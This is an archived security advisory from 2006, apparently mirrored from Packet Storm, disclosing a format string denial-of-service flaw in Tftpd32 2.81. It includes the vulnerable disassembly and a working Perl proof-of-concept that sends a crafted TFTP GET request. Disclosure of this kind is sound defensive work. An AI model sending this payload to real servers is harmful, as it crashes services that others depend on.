Lucene search
K

Critical-006.txt

🗓️ 25 Jan 2006 00:00:00Reported by Critical SecurityType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Critical security advisory #006 for Tftpd32 2.81 Format String + DoS vulnerabilit

Code
`Critical security advisory #006  
Tftpd32 2.81 Format String + DoS PoC  
Critical Security - 22:03 2006.01.19  
Critical Security research: http://www.critical.lt  
Product site: http://tftpd32.jounin.net/  
Credits : Critical Security Team (www.critical.lt)  
Original Advisory: http://www.critical.lt/?vulnerabilities/200  
Due to incorrect use of format strings there is a possibility of remote code execution. You can trigger this vulnerability  
by sending SEND or GET request with a specially formated string. Vulnerable code:  
  
LEA ECX,DWORD PTR SS:[ESP+430]  
LEA EAX,DWORD PTR SS:[ESP+1C]  
PUSH ECX ; /Arglist  
PUSH EDX ; |Format  
PUSH EAX ; |s = 00E6F4E8  
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA  
  
Proof of concept exploit:  
http://www.critical.lt/research/tftpd32_281_dos.txt  
  
#!/usr/bin/perl  
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt  
use IO::Socket;  
$port = "69";  
$host = "127.0.0.1";  
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');  
$bzz = "\x00\x01" ; #GET  
$bzz .= "%.1000x\x00";  
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet  
$tftpudp->send($bzz);  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation